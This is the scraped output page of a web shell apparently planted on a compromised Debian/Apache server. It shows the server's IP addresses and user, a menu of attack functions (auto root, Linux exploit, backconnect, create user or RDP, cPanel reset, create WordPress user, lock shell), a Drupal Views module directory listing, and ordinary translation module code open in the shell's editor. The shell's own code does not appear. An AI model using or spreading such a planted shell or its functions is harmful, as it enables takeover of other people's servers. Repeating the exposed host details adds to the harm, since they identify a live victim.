Linux polon 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64
Apache/2.4.59 (Debian)
: 10.2.73.233 | : 3.142.198.108
Cant Read [ /etc/named.conf ]
5.6.40-64+0~20230107.71+debian10~1.gbp673146
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
baltic /
web /
modules /
views /
modules /
[ HOME SHELL ]
Name
Size
Permission
Action
aggregator
[ DIR ]
drwxr-xr-x
book
[ DIR ]
drwxr-xr-x
comment
[ DIR ]
drwxr-xr-x
contact
[ DIR ]
drwxr-xr-x
field
[ DIR ]
drwxr-xr-x
filter
[ DIR ]
drwxr-xr-x
locale
[ DIR ]
drwxr-xr-x
node
[ DIR ]
drwxr-xr-x
profile
[ DIR ]
drwxr-xr-x
search
[ DIR ]
drwxr-xr-x
statistics
[ DIR ]
drwxr-xr-x
system
[ DIR ]
drwxr-xr-x
taxonomy
[ DIR ]
drwxr-xr-x
tracker
[ DIR ]
drwxr-xr-x
translation
[ DIR ]
drwxr-xr-x
user
[ DIR ]
drwxr-xr-x
aggregator.views.inc
12.06
KB
-rw-r--r--
book.views.inc
3.37
KB
-rw-r--r--
comment.views.inc
19.74
KB
-rw-r--r--
comment.views_default.inc
14.23
KB
-rw-r--r--
contact.views.inc
450
B
-rw-r--r--
field.views.inc
18.61
KB
-rw-r--r--
file.views.inc
2.33
KB
-rw-r--r--
filter.views.inc
744
B
-rw-r--r--
image.views.inc
2.31
KB
-rw-r--r--
locale.views.inc
5.77
KB
-rw-r--r--
node.views.inc
24.63
KB
-rw-r--r--
node.views_default.inc
16.01
KB
-rw-r--r--
node.views_template.inc
7.79
KB
-rw-r--r--
poll.views.inc
1006
B
-rw-r--r--
profile.views.inc
5.63
KB
-rw-r--r--
search.views.inc
5.74
KB
-rw-r--r--
search.views_default.inc
5.99
KB
-rw-r--r--
statistics.views.inc
6.35
KB
-rw-r--r--
statistics.views_default.inc
12.89
KB
-rw-r--r--
system.views.inc
19.52
KB
-rw-r--r--
taxonomy.views.inc
17.28
KB
-rw-r--r--
taxonomy.views_default.inc
5.63
KB
-rw-r--r--
tracker.views.inc
5.21
KB
-rw-r--r--
translation.views.inc
3.48
KB
-rw-r--r--
user.views.inc
16.23
KB
-rw-r--r--
views.views.inc
3.62
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : translation.views.inc
<?php /** * @file * Provide views data and handlers for translation.module. * * @ingroup views_module_handlers */ /** * Implements hook_views_data_alter(). * * Add translation information to the node table. */ function translation_views_data_alter(&$data) { // Joins $data['node']['table']['join']['node'] = array( 'left_field' => 'tnid', 'field' => 'tnid', ); // The translation ID (nid of the "source" translation) $data['node']['tnid'] = array( 'group' => t('Content translation'), 'title' => t('Translation set node ID'), 'help' => t('The ID of the translation set the content belongs to.'), 'field' => array( 'handler' => 'views_handler_field_node', 'click sortable' => TRUE, ), 'filter' => array( 'handler' => 'views_handler_filter_numeric', ), 'argument' => array( 'handler' => 'views_handler_argument_node_tnid', 'name field' => 'title', // the field to display in the summary. 'numeric' => TRUE, 'validate type' => 'tnid', ), 'sort' => array( 'handler' => 'views_handler_sort', ), 'relationship' => array( 'title' => t('Source translation'), 'help' => t('The source that this content was translated from.'), 'base' => 'node', 'base field' => 'nid', 'handler' => 'views_handler_relationship', 'label' => t('Source translation'), ), ); // The source translation. $data['node']['translation'] = array( 'group' => t('Content translation'), 'title' => t('Translations'), 'help' => t('Versions of content in different languages.'), 'relationship' => array( 'title' => t('Translations'), 'help' => t('Versions of content in different languages.'), 'base' => 'node', 'base field' => 'tnid', 'relationship table' => 'node', 'relationship field' => 'nid', 'handler' => 'views_handler_relationship_translation', 'label' => t('Translations'), ), ); // The source translation. $data['node']['source_translation'] = array( 'group' => t('Content translation'), 'title' => t('Source translation'), 'help' => t('Content that is either untranslated or is the original version of a translation set.'), 'filter' => array( 'handler' => 'views_handler_filter_node_tnid', ), ); // The source translation. $data['node']['child_translation'] = array( 'group' => t('Node translation'), 'title' => t('Child translation'), 'help' => t('Content that is a translation of a source translation.'), 'filter' => array( 'handler' => 'views_handler_filter_node_tnid_child', ), ); // Translation status $data['node']['translate'] = array( 'group' => t('Content translation'), 'title' => t('Translation status'), 'help' => t('The translation status of the content - whether or not the translation needs to be updated.'), 'field' => array( 'handler' => 'views_handler_field_boolean', 'click sortable' => TRUE, ), 'filter' => array( 'handler' => 'views_handler_filter_boolean_operator', 'label' => t('Outdated'), 'type' => 'yes-no', ), 'sort' => array( 'handler' => 'views_handler_sort', ), ); // Translate node link. $data['node']['translate_node'] = array( 'group' => t('Content translation'), 'title' => t('Translate link'), 'help' => t('Provide a simple link to translate the node.'), 'field' => array( 'handler' => 'views_handler_field_node_link_translate', ), ); }
Close